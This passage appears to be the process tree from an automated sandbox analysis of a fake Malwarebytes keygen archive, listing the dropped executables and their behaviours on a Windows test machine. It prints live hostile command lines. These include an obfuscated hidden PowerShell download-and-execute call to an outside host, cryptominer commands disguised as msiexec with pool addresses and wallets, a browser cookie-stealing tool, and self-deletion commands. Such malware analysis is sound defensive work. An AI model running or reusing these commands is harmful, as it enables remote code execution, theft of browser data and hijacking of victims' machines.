                                        "C:\Users\Admin\AppData\Roaming\FB9C.tmp.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks processor information in registry
                                        PID:5004
                                    • C:\Users\Admin\AppData\Roaming\FD33.tmp.exe
                                      "C:\Users\Admin\AppData\Roaming\FD33.tmp.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4924
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\FD33.tmp.exe"
                                        6⤵
                                          PID:2232
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /T 10 /NOBREAK
                                            7⤵
                                            • Delays execution with timeout.exe
                                            PID:788
                                      • C:\Users\Admin\AppData\Local\Temp\cd55bdfb..exe
                                        "C:\Users\Admin\AppData\Local\Temp\cd55bdfb..exe"
                                        5⤵
                                          PID:4264
                                          • C:\Windows\system32\msiexec.exe
                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                                            6⤵
                                            • Blocklisted process makes network request
                                            PID:5588
                                          • C:\Windows\system32\msiexec.exe
                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                            6⤵
                                              PID:5716
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                            5⤵
                                              PID:5264
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1
                                                6⤵
                                                • Runs ping.exe
                                                PID:5520
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            PID:5340
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:4344
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              5⤵
                                              • Executes dropped EXE
                                              PID:1576
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              5⤵
                                              • Executes dropped EXE
                                              PID:4704
                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                      1⤵
                                      • Drops file in Windows directory
                                      • Modifies Internet Explorer settings
                                      • Modifies registry class
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:2132
                                    • C:\Windows\system32\browser_broker.exe
                                      C:\Windows\system32\browser_broker.exe -Embedding
                                      1⤵
                                      • Modifies Internet Explorer settings
                                      PID:3604
                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                      1⤵
                                      • Suspicious behavior: MapViewOfSection
                                      • Suspicious use of SetWindowsHookEx
                                      • Suspicious use of WriteProcessMemory
                                      PID:4376
                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                      1⤵
                                      • Modifies Internet Explorer settings
                                      • Modifies registry class
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4448
                                    • C:\Users\Admin\AppData\Local\Temp\is-ADHNR.tmp\vict.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-ADHNR.tmp\vict.tmp" /SL5="$10400,870426,780800,C:\Users\Admin\AppData\Local\Temp\5rxkahbu0kp\vict.exe" /VERYSILENT /id=535
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      • Suspicious use of FindShellTrayWindow
                                      PID:5064
                                      • C:\Users\Admin\AppData\Local\Temp\is-HA6RV.tmp\winhost.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-HA6RV.tmp\winhost.exe" 535
                                        2⤵
                                        • Executes dropped EXE
                                        PID:5388
                                        • C:\Users\Admin\AppData\Local\Temp\MSaZEHGZ7.exe
                                          "C:\Users\Admin\AppData\Local\Temp\MSaZEHGZ7.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5164
                                          • C:\Users\Admin\AppData\Local\Temp\MSaZEHGZ7.exe
                                            "C:\Users\Admin\AppData\Local\Temp\MSaZEHGZ7.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Checks processor information in registry
                                            PID:5496
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                          3⤵
                                            PID:4432
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                              4⤵
                                                PID:4412
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Modifies registry class
                                          PID:5256
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Modifies registry class
                                          PID:5600
                                        • \??\c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                          1⤵
                                          • Drops file in Windows directory
                                          • Checks SCSI registry key(s)
                                          PID:5012
                                          • C:\Windows\system32\DrvInst.exe
                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{59fb3f4c-8f8e-4a4b-92e6-a55675af211e}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                            2⤵
                                            • Drops file in System32 directory
                                            • Drops file in Windows directory
                                            • Checks SCSI registry key(s)
                                            • Modifies data under HKEY_USERS
                                            PID:6080
                                          • C:\Windows\system32\DrvInst.exe
                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000120"
                                            2⤵
                                            • Drops file in Drivers directory
                                            • Drops file in System32 directory
                                            • Drops file in Windows directory
                                            • Checks SCSI registry key(s)
                                            PID:5692
                                        • \??\c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                          1⤵
                                            PID:3956
                                          • \??\c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                            1⤵
                                            • Checks SCSI registry key(s)
                                            PID:5872
                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                            1⤵
                                            • Modifies registry class
                                            PID:2096
                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                            1⤵
                                            • Modifies registry class
                                            PID:6120
                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                            1⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Modifies data under HKEY_USERS
                                            PID:5224
                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                              MaskVPNUpdate.exe /silent
                                              2⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4488
                                          • \??\c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                            1⤵
                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                            PID:5680
                                          • C:\Windows\windefender.exe
                                            C:\Windows\windefender.exe
                                            1⤵
                                            • Executes dropped EXE
                                            PID:4340
                                          • C:\Users\Admin\Desktop\Malwarebytes.1.51.2.1300.dat.keygen\Malwarebytes.1.51.2.1300.dat.keygen.exe
                                            "C:\Users\Admin\Desktop\Malwarebytes.1.51.2.1300.dat.keygen\Malwarebytes.1.51.2.1300.dat.keygen.exe"
                                            1⤵
                                              PID:4516
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "
                                                2⤵
                                                  PID:4532
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe
                                                    keygen-pr.exe -p83fsase3Ge
                                                    3⤵
                                                      PID:5108
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"
                                                        4⤵
                                                          PID:2132
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe
                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat
                                                            5⤵
                                                              PID:988
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe
                                                          keygen-step-1.exe
                                                          3⤵
                                                            PID:5864
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe
                                                            keygen-step-3.exe
                                                            3⤵
                                                              PID:5820
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"
                                                                4⤵
                                                                  PID:2336
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                    5⤵
                                                                    • Runs ping.exe
                                                                    PID:2448
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe
                                                                keygen-step-4.exe
                                                                3⤵
                                                                  PID:4600
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"
                                                                    4⤵
                                                                      PID:896
                                                                      • C:\Users\Admin\AppData\Local\Temp\NUSAP26MDP\multitimer.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\NUSAP26MDP\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                        5⤵
                                                                        • Drops file in Windows directory
                                                                        PID:4972
                                                                        • C:\Users\Admin\AppData\Local\Temp\NUSAP26MDP\multitimer.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\NUSAP26MDP\multitimer.exe" 1 3.1616250108.605604fc1a88b 101
                                                                          6⤵
                                                                            PID:2324
                                                                            • C:\Users\Admin\AppData\Local\Temp\NUSAP26MDP\multitimer.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\NUSAP26MDP\multitimer.exe" 2 3.1616250108.605604fc1a88b
                                                                              7⤵
                                                                              • Checks for any installed AV software in registry
                                                                              • Maps connected drives based on registry
                                                                              • Enumerates system info in registry
                                                                              PID:5100
                                                                              • C:\Users\Admin\AppData\Local\Temp\npx0k4qez0p\vict.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\npx0k4qez0p\vict.exe" /VERYSILENT /id=535
                                                                                8⤵
                                                                                  PID:4620
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-5BUIH.tmp\vict.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-5BUIH.tmp\vict.tmp" /SL5="$B0324,870426,780800,C:\Users\Admin\AppData\Local\Temp\npx0k4qez0p\vict.exe" /VERYSILENT /id=535
                                                                                    9⤵
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in Program Files directory
                                                                                    PID:5336
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-H6AQV.tmp\winhost.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-H6AQV.tmp\winhost.exe" 535
                                                                                      10⤵
                                                                                        PID:6036
                                                                                  • C:\Users\Admin\AppData\Local\Temp\lotjgd5nmko\Setup3310.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\lotjgd5nmko\Setup3310.exe" /Verysilent /subid=577
                                                                                    8⤵
                                                                                      PID:4440
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-CA762.tmp\Setup3310.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-CA762.tmp\Setup3310.tmp" /SL5="$302E4,138429,56832,C:\Users\Admin\AppData\Local\Temp\lotjgd5nmko\Setup3310.exe" /Verysilent /subid=577
                                                                                        9⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:2440
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-IAJVL.tmp\Setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-IAJVL.tmp\Setup.exe" /Verysilent
                                                                                          10⤵
                                                                                            PID:4852
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-PGSA5.tmp\Setup.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-PGSA5.tmp\Setup.tmp" /SL5="$402C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IAJVL.tmp\Setup.exe" /Verysilent
                                                                                              11⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:5988
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LQPHA.tmp\Delta.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LQPHA.tmp\Delta.exe" /Verysilent
                                                                                                12⤵
                                                                                                  PID:6096
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-EFR24.tmp\Delta.tmp
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-EFR24.tmp\Delta.tmp" /SL5="$30304,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LQPHA.tmp\Delta.exe" /Verysilent
                                                                                                    13⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5912
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AJ5H7.tmp\Setup.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AJ5H7.tmp\Setup.exe" /VERYSILENT
                                                                                                      14⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks processor information in registry
                                                                                                      PID:900
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-AJ5H7.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
                                                                                                        15⤵
                                                                                                          PID:4380
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /im Setup.exe /f
                                                                                                            16⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:3620
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout /t 6
                                                                                                            16⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:4756
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LQPHA.tmp\hjjgaa.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LQPHA.tmp\hjjgaa.exe" /Verysilent
                                                                                                    12⤵
                                                                                                      PID:5396
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        13⤵
                                                                                                          PID:2912
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          13⤵
                                                                                                            PID:4252
                                                                                                • C:\Users\Admin\AppData\Local\Temp\fovwck3hudn\x5ipm4t2dye.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\fovwck3hudn\x5ipm4t2dye.exe" /ustwo INSTALL
                                                                                                  8⤵
                                                                                                    PID:5348
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "x5ipm4t2dye.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\fovwck3hudn\x5ipm4t2dye.exe" & exit
                                                                                                      9⤵
                                                                                                        PID:1492
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /im "x5ipm4t2dye.exe" /f
                                                                                                          10⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:4880
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\lgzhcgdntg4\askinstall24.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\lgzhcgdntg4\askinstall24.exe"
                                                                                                      8⤵
                                                                                                        PID:3684
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                          9⤵
                                                                                                            PID:2672
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /f /im chrome.exe
                                                                                                              10⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4136
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gaisynjjrgb\AwesomePoolU1.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\gaisynjjrgb\AwesomePoolU1.exe"
                                                                                                          8⤵
                                                                                                            PID:2728
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2TUB1M0UPI\setups.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\2TUB1M0UPI\setups.exe" ll
                                                                                                      5⤵
                                                                                                        PID:5752
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-7NMR8.tmp\setups.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-7NMR8.tmp\setups.tmp" /SL5="$504F0,443958,217088,C:\Users\Admin\AppData\Local\Temp\2TUB1M0UPI\setups.exe" ll
                                                                                                          6⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Loads dropped DLL
                                                                                                          PID:4668
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX5\askinstall20.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX5\askinstall20.exe"
                                                                                                      4⤵
                                                                                                        PID:2640
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                          5⤵
                                                                                                            PID:4120
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /f /im chrome.exe
                                                                                                              6⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:5916
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"
                                                                                                          4⤵
                                                                                                            PID:6012
                                                                                                            • C:\Users\Admin\AppData\Roaming\4230.tmp.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\4230.tmp.exe"
                                                                                                              5⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5292
                                                                                                              • C:\Users\Admin\AppData\Roaming\4230.tmp.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\4230.tmp.exe"
                                                                                                                6⤵
                                                                                                                • Checks processor information in registry
                                                                                                                PID:2580
                                                                                                            • C:\Users\Admin\AppData\Roaming\42AE.tmp.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\42AE.tmp.exe"
                                                                                                              5⤵
                                                                                                              • Loads dropped DLL
                                                                                                              PID:5492
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\42AE.tmp.exe"
                                                                                                                6⤵
                                                                                                                  PID:5868
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /T 10 /NOBREAK
                                                                                                                    7⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:5716
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4e36cb40..exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\4e36cb40..exe"
                                                                                                                5⤵
                                                                                                                • Adds Run key to start application
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:2324
                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                                                                                                                  6⤵
                                                                                                                  • Blocklisted process makes network request
                                                                                                                  PID:4168
                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                  6⤵
                                                                                                                    PID:2476
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"
                                                                                                                  5⤵
                                                                                                                    PID:1480
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping 127.0.0.1
                                                                                                                      6⤵
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:5732
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"
                                                                                                                  4⤵
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  PID:5800
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 4308
                                                                                                                    5⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    • Program crash
                                                                                                                    PID:184
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe"
                                                                                                                  4⤵
                                                                                                                    PID:5636
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      5⤵
                                                                                                                        PID:5080
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        5⤵
                                                                                                                          PID:5380
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:4260
                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                  PID:4220
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:4288
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  PID:4052
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                    PID:2340
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:5132
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:5892
                                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:6112
                                                                                                                  • C:\Windows\system32\msinfo32.exe
                                                                                                                    "C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\Malwarebytes.1.51.2.1300.dat.keygen\FUTURiTY.nfo"
                                                                                                                    1⤵
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:1116
                                                                                                                  • C:\Users\Admin\Desktop\Malwarebytes.1.51.2.1300.dat.keygen\Malwarebytes.1.51.2.1300.dat.keygen.exe
                                                                                                                    "C:\Users\Admin\Desktop\Malwarebytes.1.51.2.1300.dat.keygen\Malwarebytes.1.51.2.1300.dat.keygen.exe"
                                                                                                                    1⤵
                                                                                                                      PID:4016
